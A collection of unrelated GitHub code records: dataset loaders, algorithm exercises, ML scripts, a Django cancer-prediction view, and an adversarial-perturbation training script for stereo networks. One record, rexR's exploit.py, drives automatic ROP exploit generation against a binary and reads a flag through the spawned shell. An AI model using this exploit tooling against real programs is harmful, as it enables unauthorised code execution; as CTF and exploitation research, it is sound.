'_ori.jpg')\n image = cv2.imread(f\"{self.image_directory}/{image_filename}\")\n\n item['image'] = image\n return item","repo_name":"rayfok/scim-nlp","sub_path":"scienceparseplus/src/scienceparseplus/datasets/docbank.py","file_name":"docbank.py","file_ext":"py","file_size_in_byte":17400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38877900287","text":"import sys\ninput = sys.stdin.readline\n# input\nN, L = map(int, input().split())\nroad = [None for _ in range(L + 1)]\nfor _ in range(N):\n\td, r, g = map(int, input().split())\n\troad[d] = (r, g)\n# process\n'''\nmax(N)=max(R)=100, max(L)=1000이므로 \n상근이의 최대 대기시간은 10000초 + 이동시간은 1000초.\n'''\ncur = 1\ntime = 0\nwhile cur < L:\n\t# 지금 위치에 신호등이 없을 경우 움직임\n\tif road[cur] is None: cur += 1\n\t# 신호등이 있으면\n\telse:\n\t\tr, g = road[cur]\n\t\t# 초록불일 경우 움직임\n\t\tif not 0 <= time % (r + g) < r: cur += 1\n\ttime += 1\t\n# output\nprint(time)","repo_name":"WaiNaat/BOJ-Python","sub_path":"2980.py","file_name":"2980.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35840077812","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\n\nclass fisher_discriminator():\n def __init__(self, fname_train):\n self.training_data = self.load_data(fname_train)\n\n # self.class_covariances = None\n # self.class_means = self.calc_means()\n # self.class_determinants = None\n\n\n def train(self,):\n covs = self.calc_covariances()\n\n return\n\n\n def calc_means(self,):\n means = {}\n\n for key in self.training_data.keys():\n mu = np.sum(self.training_data[key], axis=0) # sum over data\n mu = mu / self.training_data[key].shape[0] # divide by N\n means[key] = mu\n\n print(means)\n return means\n\n\n def calc_covariances(self,):\n covs = {}\n means = self.calc_means()\n\n for key in means.keys():\n covs[key] = np.matmul(self.training_data[key].T, self.training_data[key])\n print(covs[key].shape)\n\n return covs\n\n\n def calc_determinants(self,):\n dets = {}\n covs = self.calc_covariances()\n\n for key in covs.keys():\n dets[key] = np.linalg.det(covs[key])\n print(dets[key])\n\n return\n\n\n def load_data(self, fname):\n data_raw = np.genfromtxt(fname, delimiter=' ')\n data = {i : [] for i in range(0, 10)}\n\n for row in data_raw:\n data[int(row[0])].append(row[1:])\n\n for key in data.keys():\n data[key] = np.array(data[key])\n\n return data\n\n\ndef main():\n fd = fisher_discriminator('zip.train')\n fd.calc_determinants()\n means = fd.calc_means()\n print(means)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rrtroutslater/stat_learning","sub_path":"fisher_discriminator/fisher_discriminator.py","file_name":"fisher_discriminator.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72839191687","text":"# Import SQLITE\nimport sqlite3\n\ndef tableExists(con, tableName):\n cur = con.cursor()\n # Zkus...\n try:\n # Ziskat pocet tabulek s nazvem 'tableName' ze specialni tabulky sqlite_master\n cur.execute(\"SELECT COUNT(*) FROM sqlite_master WHERE type=? AND name=?;\", ('table', tableName))\n except sqlite3.Error as e:\n # Ooops, neco se nepovedlo, napis, kde je problem a skocni\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n r = cur.fetchone()\n # Vrat True, pokud SQL dotaz nasel prave jeden zaznam (tzn. tabulka 'tableName' existuje),\n # nebo False, pokud SQL dotaz nenasel nic (tzn. tabulka 'tableName' neexistuje)\n return r[0] == 1\n\ndef createMyTable(con):\n cur = con.cursor()\n # Zkus ...\n try:\n # Vytvorit tabulku mytable\n cur.execute(\"CREATE TABLE mytable (id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(60), date DATETIME);\")\n except sqlite3.Error as e:\n # Ooops, neco se nepovadlo, napis, kde je problem a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n\n# Otevri nasi databazi\ncon = sqlite3.connect('mydb.sqlite')\n# Ziskej kurzor, \"ukazatel\" do nasi databaze\ncur = con.cursor()\n\n# Zkontroluj, jestli tabulka uz existuje a kdyz ne, tak ji vytvor\nif not tableExists(con, 'mytable'):\n createMyTable(con)\n\n# Zeptej se na jmeno\nname = input(\"Zadej jmeno: \")\n\n# Zkus...\ntry:\n # Vloz do tabulky zadane jmeno a aktualni datum a cas\n cur.execute(\"INSERT INTO mytable (name, date) VALUES(?, datetime('now'));\", (name,));\nexcept sqlite3.Error as e:\n # Kdyz se to nepovede, tak vypis proc a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n# Vsechno se povedlo, ukonci transakci a data fyzicky uloz do databaze (na disk)\ncon.commit()\n\n# Vyber vsechny zaznamy z tabulky\nres = cur.execute(\"SELECT id, name, date FROM mytable ORDER BY date DESC;\")\n\n# Vezmi jeden zaznam z 'res' (vysledku')\nrow = res.fetchone()\n# Opakuj, dokud row neni None (prazdny)\nwhile row != None:\n # Vypis jmeno a datum z aktualniho zaznamu\n print(\"ID: {id:<5} Name: {name:10} Date: {date}\".format(id = row[0], name=row[1], date=row[2]))\n # Posun se na dalsi zaznam z tabulky\n row = res.fetchone()\n\n# Ukonci spojeni s databazi a skonci\ncon.close()\n","repo_name":"danvratil/dapraha-flask","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10417312929","text":"# May cause deprecation warnings, safe to ignore, they aren't errors\nfrom pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import desc\n# Can only run this once. restart your kernel for any errors.\nsc = SparkContext()\n\nssc = StreamingContext(sc, 10 )\nsqlContext = SQLContext(sc)\nsocket_stream = ssc.socketTextStream(\"127.0.0.1\", 5555)\nlines = socket_stream.window( 20 )\nfrom collections import namedtuple\nfields = (\"tag\", \"count\" )\nTweet = namedtuple( 'Tweet', fields )\n# Use Parenthesis for multiple lines or use \\.\n( lines.flatMap( lambda text: text.split( \" \" ) ) #Splits to a list\n .filter( lambda word: word.lower().startswith(\"#\") ) # Checks for hashtag calls\n .map( lambda word: ( word.lower(), 1 ) ) # Lower cases the word\n .reduceByKey( lambda a, b: a + b ) # Reduces\n .map( lambda rec: Tweet( rec[0], rec[1] ) ) # Stores in a Tweet Object\n .foreachRDD( lambda rdd: rdd.toDF().sort( desc(\"count\") ) # Sorts Them in a DF\n .limit(10).registerTempTable(\"tweets\") ) ) # Registers to a table.","repo_name":"JacobMonksRev/BigData05312022","sub_path":"Notes/Week9/Twitter_Stream/spark_st_run.py","file_name":"spark_st_run.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"20436454649","text":"from django.shortcuts import render,HttpResponse,redirect,get_object_or_404\nfrom .models import Cancer\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nimport keras\nfrom keras.layers import Input, Dense\nfrom keras.optimizers import SGD\nfrom sklearn.impute import SimpleImputer\nimport numpy as np\nimport pandas as pd\n# from .myform import MyForm\n# Create your views here.\ndef index(request):\n return render(request, \"index.html\")\n\ndef features(request):\n return render(request, \"features.html\")\n\ndef price(request):\n return render(request, \"pricing.html\")\n\ndef blog(request):\n return render(request, \"blog.html\")\n\ndef contact(request):\n return render(request, \"contact.html\")\n\ndef cancer(request):\n cancers = Cancer.objects.all()\n\n return render(request, \"test.html\",{\"cancers\":cancers})\n\ndef addCancer(request):\n # f = MyForm()\n if request.method == \"GET\":\n return redirect(\"/cancer\")\n else:\n # Hasta Kişisel Bilgileri\n tc = request.POST.get(\"tc\")\n firstName = request.POST.get(\"firstName\")\n lastName = request.POST.get(\"lastName\")\n length = request.POST.get(\"length\")\n age = request.POST.get(\"age\")\n sex = request.POST.get(\"sex\")\n city = request.POST.get(\"city\")\n country = request.POST.get(\"country\")\n # ************Yapay Zeka Alanı****************\n # verilerimizi okuyup değişkenimizin içine atıyorum\n veri = pd.read_csv(\"datasets/breast-cancer.data\")\n # verisetimizde bulunan \"?\" yani bilinmeyen kısımları hesaplanmaması için -99999 gibi bir değer veriyorum\n veri.replace('?', -99999, inplace=True)\n veriyeni = veri.drop(['1000025'], axis=1)\n imp = SimpleImputer(missing_values=-99999, strategy=\"mean\", fill_value=None, verbose=0, copy=True)\n veriyeni = imp.fit_transform(veriyeni) # sklearn\n # 8 adet özelliğe bağlı bir giriş katmanımız var \n # (Hücre Boyutunun Düzgünlüğü, Hücre Şeklinin Düzgünlüğü, Marjinal Yapışma, Tek Epitel Hücre Boyutu,\n # Çıplak Çekirdekler, Uyumlu Kromatin, Normal Nikloeller, Normal Nikloeller, Mitoz)\n # bu 8 katmana göre 1 tane veriyi tahmin etmeye çalışıyoruz\n giris = veriyeni[:, 0:8] # giris.shape => (698,8) 8 özelliğe bağlı giriş katmanımız\n cikis = veriyeni[:, 9] # cikis.shape => 8 özellikten tahmin ettiğimiz çıkış katmanımız\n # *** VERİ SETİ İŞLEMLERİ TAMAM ŞİMDİ MODELİMİZİ OLUŞTURALIM\n # bu altta vereceğim fotoğraf sequential le alakalı sunumda felan kullanıp 63 ve 64.satırları sil\n # https://bilimfili.com/wp-content/uploads/2015/12/yapay-sinir-aglari1-bilimfilicom.jpg\n model = Sequential() # Yapay sinir ağları algılayıcıların ardışık olmasına bağlı \n # Dense: yapay sinir ağında görülen her ağ kendinden sonraki noktalara bağlı\n # input dimension ' a kaç tane özelliğimiz olduğunu yazıyoruz biz 8 özellikten output u tahmin edeceğiz\n model.add(Dense(10, input_dim=8))\n # Aktivasyon fonksiyonuna sokalım\n # Step Fonksiyonu: Bir eşik değeri alarak ikili bir sınıflandırma çıktısı (0 yada 1) üretir.\n # Sigmoid Fonksiyonu: En yaygın kullanılan aktivasyon fonksiyonlarından birisidir, [0,1] aralığında çıktı üretir.\n # Tanh Fonksiyonu: [-1,1] aralığında çıktı üreten doğrusal olmayan bir fonksiyondur.\n # ReLU Fonksiyonu: Doğrusal olmayan bir fonksiyondur. ReLU fonksiyonu negatif girdiler için 0 değerini alırken, x pozitif girdiler için x değerini almaktadır.\n # Softmax Fonksiyonu: Çoklu sınıflandırma problemleri için kullanılan bu fonksiyon, verilen her bir girdinin bir sınıfa ait olma olasılığını gösteren [0,1] arası çıktılar üretmektedir.\n # Softplus Fonksiyonu: Sigmoid ve Tanh gibi geleneksel aktivasyon fonksiyonlarına alternatif olarak sunulan bu fonksiyon (0, +∞) aralığında türevlenebilir bir çıktı üretmektedir.\n # ELU Fonksiyonu: Üstel lineer birim, negatif girdiler hariç ReLU ile benzerdir. Negatif girdilerde ise genellikle 1.0 alınan alfa parametresi almaktadır.\n # PReLU Fonksiyonu: Parametrik ReLU olarak geçen bu aktivasyon fonksiyonu da negatif girdiler için extra alfa sabiti ile verilen girdinin çarpım sonucunu çıktı olarak üretmektedir.\n # Swish Fonksiyonu: Google araştırmacıları tarafından yeni keşfedilen bu fonksiyon girdiler ile sigmoid fonksiyonunun çarpımını çıktı olarak üretmektedir.\n # İlk başta hidden layers kısmını yazdık şimdi aktivasyon fonksiyonuyla verilerimizi normalize ettik yani 0-1 arasına yerleştirdik\n # NEDEN RELU yu kullandık?\n # Matrislerde sürekli y = mx + b işlemi çalışacağı için çok yüksek değerler elde ediyoruz biz bunu belli bir değer arasına sokmamız lazım\n # bunun için aktivasyon fonksiyonu kullanıyoruz verilerimizi 0 ile 1 arasına sokuyoruz \n model.add(Activation('relu')) # model.add(Activation('tanh')) daha hızlı sonuç verdi\n # Katmandaki node ların yarısını o tekrar içine sokmuyor eğer 0.2 yazılırsa 5'te 1 ini o tekrar için işleme sokmaz.\n # farklı node ları işleme sokmamızın nedeni veri seti ezberinin önüne geçmek için yapıyoruz \n # eğer dropout kullanmazsak tahminimiz %100 olur fakat bu ezberlenmiş bir model demektir bizim için makul değer %90-%95 \n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('relu')) # model.add(Activation('tanh'))\n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('softmax')) # hep en sonda tut\n # Yapay sinir ağımızı oluşturduk \n # lr: learning rate =>Ne kadar hızlı öğreneceğimizi anlamaya çalışan bir sistem\n # lr ile epoch arasında ters orantı var\n # lr yi düşük alrısak epoch değerini yüksek almamız gerekir \n optimizer = keras.optimizers.SGD(lr=0.01)\n # gerçek-tahmini karesini alıp türevini 0 a eşitliyoruz \n # algoritmamızın ne kadar doğru ne kadar yanlış yaptığını anlamak için metrics = accuracy yapıyoruz \n model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n # modelimiz bitti şimdi bu verileri modele yerleştirmek kaldı \n # 2: iyi huylu tümör, 4: kötü huylu tümör\n # epochs: veri setini ayrı ayrı 10 kere tarayacak\n # batch_size: aynı anda kaç bit lik işlemi hafızaya alsın yazılmazsa kendisi otomatik değer atar.\n # validation_split: (Doğrulama kısmı) bütün verimizin bir kısmını yapay sinir ağımıza yerleştirelim\n # Elimizde kalan sinir ağına sokmadığımız işlenmemiş veriyi veri setine sokarak tahmin etmesini sağlayacağız.\n # eğer tamamıyla işleme sokarsak model verileri ezberler. Bizim amacımız görmeden tahmin etmesi \n model.fit(giris, cikis, epochs=10, batch_size=32, validation_split=0.20)\n # inputlar\n uniformity_cell_size = request.POST.get(\"uniformity_cell_size\")\n uniformity_cell_shape = request.POST.get(\"uniformity_cell_shape\")\n marginal_adhesion = request.POST.get(\"marginal_adhesion\")\n single_epithelial_cell_size = request.POST.get(\"single_epithelial_cell_size\")\n bare_nuclei = request.POST.get(\"bare_nuclei\")\n bland_chromatin = request.POST.get(\"bland_chromatin\")\n normal_nucleoli = request.POST.get(\"normal_nucleoli\")\n mitoses = request.POST.get(\"mitoses\")\n #a = 5\n #b = 5\n #c = 5\n #d = 8\n #e = 10\n #f = 8\n #g = 7\n #h = 3\n tahmin = np.array(\n [\n uniformity_cell_size,\n uniformity_cell_shape,\n marginal_adhesion,\n single_epithelial_cell_size,\n bare_nuclei,\n bland_chromatin,\n normal_nucleoli,\n mitoses\n ]\n ).reshape(1, 8)\n print(model.predict_classes(tahmin))\n result = model.predict_classes(tahmin)\n newCancer = Cancer(\n tc=tc,\n firstName=firstName,\n lastName=lastName,\n length=length,\n age=age,\n sex=sex,\n city=city,\n country=country,\n uniformity_cell_size=uniformity_cell_size,\n uniformity_cell_shape=uniformity_cell_shape,\n marginal_adhesion=marginal_adhesion,\n single_epithelial_cell_size=single_epithelial_cell_size,\n bare_nuclei=bare_nuclei,\n bland_chromatin=bland_chromatin,\n normal_nucleoli=normal_nucleoli,\n mitoses=mitoses,\n result = result\n )\n newCancer.save()\n return redirect(\"/cancer\")\n\n# Kayıt Silme\ndef deleteResult(request,id):\n cancer= get_object_or_404(Cancer, id = id)\n cancer.delete()\n return redirect(\"/cancer\")","repo_name":"Yigit-dev/Breast-Cancer-Detection-with-Artificial-Intelligence","sub_path":"Project/project/cancer/views-with-Comments.py","file_name":"views-with-Comments.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16016986306","text":"import autograd.numpy as np\n\nimport gym\nfrom trajopt.gps import MBGPS\n\nimport matplotlib.pyplot as plt\n\nfrom joblib import Parallel, delayed\n\nimport multiprocessing\nnb_cores = multiprocessing.cpu_count()\n\n\ndef create_job(kwargs):\n import warnings\n warnings.filterwarnings(\"ignore\")\n\n # pendulum env\n env = gym.make('Pendulum-TO-v0')\n env._max_episode_steps = 10000\n env.unwrapped.dt = 0.02\n env.unwrapped.umax = np.array([2.5])\n env.unwrapped.periodic = False\n\n dm_state = env.observation_space.shape[0]\n dm_act = env.action_space.shape[0]\n\n state = env.reset()\n init_state = tuple([state, 1e-4 * np.eye(dm_state)])\n solver = MBGPS(env, init_state=init_state,\n init_action_sigma=25., nb_steps=300,\n kl_bound=.1, action_penalty=1e-3,\n activation={'shift': 250, 'mult': 0.5})\n\n solver.run(nb_iter=100, verbose=False)\n\n solver.ctl.sigma = np.dstack([1e-1 * np.eye(dm_act)] * 300)\n data = solver.rollout(nb_episodes=1, stoch=True, init=state)\n\n obs, act = np.squeeze(data['x'], axis=-1).T, np.squeeze(data['u'], axis=-1).T\n return obs, act\n\n\ndef parallel_gps(nb_jobs=50):\n kwargs_list = [{} for _ in range(nb_jobs)]\n results = Parallel(n_jobs=min(nb_jobs, 20),\n verbose=10, backend='loky')(map(delayed(create_job), kwargs_list))\n obs, act = list(map(list, zip(*results)))\n return obs, act\n\n\nobs, act = parallel_gps(nb_jobs=50)\n\nplt.figure()\nfig, ax = plt.subplots(nrows=3, ncols=1, figsize=(12, 4))\nfor _obs, _act in zip(obs, act):\n ax[0].plot(_obs[:, :-1])\n ax[1].plot(_obs[:, -1])\n ax[2].plot(_act)\nplt.show()\n\nimport pickle\ndata = {'obs': obs, 'act': act}\npickle.dump(data, open(\"gps_pendulum_other.pkl\", \"wb\"))\n","repo_name":"hanyas/trajopt","sub_path":"examples/gps/analytical/topt/mb_pendulum_parallel.py","file_name":"mb_pendulum_parallel.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"} +{"seq_id":"35353236233","text":"import wx\n\nclass MyApp(wx.App):\n\tdef OnInit(self):\n\t\tmyframe = wx.Frame(None,-1,'test')\n\t\tmytext = wx.TextCtrl(myframe,-1,style=wx.TE_READONLY)\t# we display the selection in it\n\t\tmytree = wx.TreeCtrl(myframe,-1,style=wx.TR_HAS_BUTTONS|wx.TR_SINGLE)\t# only one item can be selected !\n\t\trootItem = mytree.AddRoot('Root')\n\t\t# populate the tree\n\t\tfor i in range(10):\n\t\t\ttmpkey = 'key_%s'%i\n\t\t\titem = mytree.AppendItem(rootItem,tmpkey)\n\t\t\tfor j in range(10):\n\t\t\t\tmytree.AppendItem(item,'tmpkey_%s'%j)\n\t\tmytree.Expand(rootItem)\n\t\t# set events\n\t\twx.EVT_TREE_BEGIN_DRAG(mytree,mytree.GetId(),lambda evt: evt.Allow())\n\t\twx.EVT_TREE_SEL_CHANGED(mytree,mytree.GetId(),lambda evt: mytext.SetValue(mytree.GetItemText(mytree.GetSelection())))\n\t\t# layout\n\t\ts = wx.BoxSizer(wx.HORIZONTAL)\n\t\ts.Add(mytree,1,wx.EXPAND)\n\t\ts.Add(mytext,0,0)\n\t\tmyframe.SetSizer(s)\n\t\tmyframe.Layout()\n\t\t# show the window\n\t\tmyframe.Show()\n\t\treturn True\n\t\t\nmyApp = MyApp()\nmyApp.MainLoop()\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/487/4874f491eab06ba3e0df4386a569fb51c7c548f1/4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_name":"4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13745041989","text":"'''\nAuthor: Zachery Berger <zackeberger@g.ucla.edu>, Parth Agrawal <parthagrawal24@g.ucla.edu>, Tian Yu Liu <tianyu139@g.ucla.edu>, Alex Wong <alexw@cs.ucla.edu>\nIf you use this code, please cite the following paper:\n\nZ. Berger, P. Agrawal, T. Liu, S. Soatto, and A. Wong. Stereoscopic Universal Perturbations across Different Architectures and Datasets.\nhttps://arxiv.org/pdf/2112.06116.pdf\n\n@inproceedings{berger2022stereoscopic,\n title={Stereoscopic Universal Perturbations across Different Architectures and Datasets},\n author={Berger, Zachery and Agrawal, Parth and Liu, Tian Yu and Soatto, Stefano and Wong, Alex},\n booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},\n year={2022}\n}\n'''\n\nimport argparse\nimport global_constants as settings\nfrom perturb_main import train\n\n\nparser = argparse.ArgumentParser()\n\n# Training and validation input filepaths\nparser.add_argument('--train_image0_path',\n type=str, required=True, help='Path to list of left image paths')\nparser.add_argument('--train_image1_path',\n type=str, required=True, help='Path to list of right image paths')\nparser.add_argument('--train_pseudo_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\nparser.add_argument('--val_image0_path',\n type=str, default=None, help='Path to list of left image paths')\nparser.add_argument('--val_image1_path',\n type=str, default=None, help='Path to list of right image paths')\nparser.add_argument('--val_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\n\n# Perturbation model settings\nparser.add_argument('--n_image_height',\n type=int, default=settings.N_IMAGE_HEIGHT, help='Height of each sample')\nparser.add_argument('--n_image_width',\n type=int, default=settings.N_IMAGE_WIDTH, help='Width of each sample')\nparser.add_argument('--output_norm',\n type=float, default=settings.OUTPUT_NORM, help='Output norm of noise')\nparser.add_argument('--gradient_scale',\n type=float, default=settings.GRADIENT_SCALE, help='Value to scale gradients by')\nparser.add_argument('--attack',\n type=str, default=settings.ATTACK, help='Perturbation attack method: [full, tile]')\nparser.add_argument('--n_perturbation_height',\n type=int, default=settings.N_PERTURBATION_HEIGHT, help='Height of perturbation')\nparser.add_argument('--n_perturbation_width',\n type=int, default=settings.N_PERTURBATION_WIDTH, help='Width of perturbation')\n\n# Optimization settings\nparser.add_argument('--n_batch',\n type=int, default=settings.N_BATCH, help='Number of samples per batch')\nparser.add_argument('--n_epoch',\n type=int, default=settings.N_EPOCH, help='Number of samples per batch')\n\n# Stereo model settings\nparser.add_argument('--stereo_method',\n type=str, default=settings.STEREO_METHOD, help='Stereo method available: %s' % settings.STEREO_METHOD_AVAILABLE)\nparser.add_argument('--stereo_model_restore_path',\n type=str, default='', help='Path to restore model checkpoint')\nparser.add_argument('--num_deform_layers',\n type=int, default=0, help='Number of deformable convolution layers [0, 6, 25]')\n\n# Checkpoint settings\nparser.add_argument('--n_checkpoint',\n type=int, default=settings.N_CHECKPOINT, help='Number of steps before saving a checkpoint')\nparser.add_argument('--checkpoint_path',\n type=str, required=True, help='Path to save checkpoints')\n\n# Hardware settings\nparser.add_argument('--n_worker',\n type=int, default=settings.N_WORKER, help='Number of workers/threads to use')\nparser.add_argument('--device',\n type=str, default=settings.DEVICE, help='Device to use: gpu, cpu')\n\n\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n\n args.stereo_method = args.stereo_method.lower()\n\n args.device = args.device.lower()\n\n if args.device not in [settings.GPU, settings.CPU, settings.CUDA]:\n args.device = settings.CUDA\n\n args.device = settings.CUDA if args.device == settings.GPU else args.device\n\n train(train_image0_path=args.train_image0_path,\n train_image1_path=args.train_image1_path,\n train_pseudo_ground_truth_path=args.train_pseudo_ground_truth_path,\n val_image0_path=args.val_image0_path,\n val_image1_path=args.val_image1_path,\n val_ground_truth_path=args.val_ground_truth_path,\n # Perturbation model settings\n n_image_height=args.n_image_height,\n n_image_width=args.n_image_width,\n output_norm=args.output_norm,\n gradient_scale=args.gradient_scale,\n attack=args.attack,\n n_perturbation_height=args.n_perturbation_height,\n n_perturbation_width=args.n_perturbation_width,\n # Optimization settings\n n_batch=args.n_batch,\n n_epoch=args.n_epoch,\n # Stereo model settings\n stereo_method=args.stereo_method,\n stereo_model_restore_path=args.stereo_model_restore_path,\n num_deform_layers=args.num_deform_layers,\n # Checkpoint settings\n n_checkpoint=args.n_checkpoint,\n checkpoint_path=args.checkpoint_path,\n # Hardware settings\n n_worker=args.n_worker,\n device=args.device)\n","repo_name":"alexklwong/stereoscopic-universal-perturbations","sub_path":"src/train_perturb_model.py","file_name":"train_perturb_model.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"} +{"seq_id":"1425350306","text":"# D3 12649 N Castle\n# 아직 x\n\ndef dfs(level):\n # 현재 level 에서 선택할수 있는 x 좌표는 0 1 2\n if level == N :\n de = - 1\n return\n for x in range(N):\n if used[x] == 1 :\n continue\n used[x] = 1 # x좌표 사용(이후의 재귀호출에서 재사용 방지)\n dfs(level+1)\n used[x] = 0 # 원상복구\n return\n \nfor _ in range(10):\n N = int(input())\n dfs(N)\n\nused = [0] * N # 0 1 2 의 사용 여부\n\n\n","repo_name":"hhongjj/Algorithm","sub_path":"SWEA/D3/D3_12649_NCastle.py","file_name":"D3_12649_NCastle.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18581653828","text":"from .x86_attack.init import *\nfrom .x86_attack.analyze import *\nimport sys\nfrom .x86_attack.shell_craft import *\n\nif __name__ == '__main__':\n info = {}\n lcs = {}\n rop_and_index = {}\n payload = []\n flag = []\n binary = sys.argv[1]\n crash_file = sys.argv[2]\n f = open(crash_file, 'r')\n crash = f.read()\n f.close()\n\n init = init(binary, crash_file)\n info = init.get_state()\n #print INFO\n\n analyze = analyze(info, binary, crash)\n lcs = analyze.find_lcs()\n if lcs == -1:\n sys.exit(0)\n rop_and_index = analyze.calc_index()\n\n shell = shell_craft(binary, crash, rop_and_index, info)\n payload = shell.create_payload()\n\n for i in payload:\n p = process(binary)\n\n p.sendline(i)\n p.sendline('echo zxcv;cat flag;')\n try:\n p.recvuntil('zxcv\\n')\n flag.append(p.recvuntil('}'))\n p.close()\n except:\n p.close()\n pass\n\n for i in flag:\n if i is not '':\n log.info(i)\n\n\n\n\n\n\n\n","repo_name":"t3ls/rex-r","sub_path":"rexR-V1.0.5-release/x86_attack/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"12904739789","text":"\"\"\"\nThis module defines how variables are tracked in order to send to Max via OSC.\n\nThere are various Stat objects that record specific types of variables or record variables\nin specific ways, as well as the StatManager object which defines all stats to record and send.\n\nAuthor: Gregg Oliva\n\"\"\"\n\n# stdlib imports\nfrom typing import Any, Dict, List, Union\n\n# project imports\nimport debug\nfrom defs import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n PROJECTILE_TYPES,\n REST, NUM_VOICES,\n FPS,\n RECORD_MUSIC\n)\nfrom osc_client import osc, OSCHandler\n\n\nclass Stat:\n \"\"\"A simple Number Stat to be sent via OSC\"\"\"\n def __init__(self, value: Any, send: bool = True) -> None:\n self.value = value\n self.send = send\n\n def update(self, value: Any) -> None:\n \"\"\"Set the value of this stat to a different object\"\"\"\n self.value = value\n\n def __add__(self, other) -> \"Stat\":\n stat = Stat(self.value + other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value + other, self.send)\n\n return stat\n\n def __sub__(self, other) -> \"Stat\":\n stat = Stat(self.value - other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value - other, self.send)\n\n return stat\n\n def __mul__(self, other) -> \"Stat\":\n stat = Stat(self.value * other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value * other, self.send)\n\n return stat\n\n def __div__(self, other) -> \"Stat\":\n stat = Stat(self.value / other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value / other, self.send)\n\n return stat\n\n def __truediv__(self, other) -> \"Stat\":\n return self.__div__(other)\n\n def __lt__(self, other) -> bool:\n return self.value < other.value \\\n if isinstance(other, Stat) \\\n else self.value < other\n\n def __le__(self, other) -> bool:\n return self.value <= other.value \\\n if isinstance(other, Stat) \\\n else self.value <= other\n\n def __eq__(self, other) -> bool:\n return self.value == other.value \\\n if isinstance(other, Stat) \\\n else self.value == other\n\n def __ne__(self, other) -> bool:\n return self.value != other.value \\\n if isinstance(other, Stat) \\\n else self.value != other\n\n def __gt__(self, other) -> bool:\n return self.value > other.value \\\n if isinstance(other, Stat) \\\n else self.value > other\n\n def __ge__(self, other) -> bool:\n return self.value >= other.value \\\n if isinstance(other, Stat) \\\n else self.value >= other\n\n def __str__(self) -> str:\n return str(self.value)\n\n def __repr__(self) -> str:\n return str(f'Stat(Value={self.value}, OSC={self.send})')\n\n\nclass TextStat:\n \"\"\"A stat that tracks strings\"\"\"\n def __init__(self, initial_text: str = '', send: bool = True) -> None:\n self.text = initial_text\n self.send = send\n\n def update(self, text: str) -> None:\n \"\"\"Update the string\"\"\"\n self.text = text\n\n def __str__(self) -> str:\n return self.text\n\n def __repr__(self) -> str:\n return str(f'TextStat(Text={self.text})')\n\n\nclass TimeStat:\n \"\"\"A stat that tracks time in ms, seconds, minutes, and hours\"\"\"\n def __init__(self, total_ms, send: bool = True) -> None:\n self.total_ms = total_ms\n self.send = send\n\n seconds, self.ms = divmod(self.total_ms, 1000)\n minutes, self.seconds = divmod(seconds, 60)\n self.hours, self.minutes = divmod(minutes, 60)\n\n @property\n def time(self):\n \"\"\"Represents Time as a tuple of Hours, Minutes, Seconds, and Ms\"\"\"\n return (self.hours, self.minutes, self.seconds, self.ms)\n\n @property\n def time_display(self) -> str:\n \"\"\"\n Display the time in a format that makes sense with how much time has ellapsed.\n e.g. as (4 minutes 32 seconds), (24 seconds), (1 hour 3 minutes 10 seconds),\n\n This function is useful for displaying Time Stats in the DEATH MENU\n \"\"\"\n time_str = [f'{self.seconds} Seconds']\n if self.minutes > 0:\n time_str.insert(0, f'{self.minutes} Minutes')\n if self.hours > 0:\n time_str.insert(0, f'{self.hours} Hours')\n return ' '.join(time_str)\n\n def __sub__(self, other) -> \"TimeStat\":\n if isinstance(other, TimeStat):\n return TimeStat(self.total_ms - other.total_ms)\n elif isinstance(other, (int, float)):\n return TimeStat(self.total_ms - other)\n else:\n raise TypeError(f'{self.__class__} unable to perform subtraction with 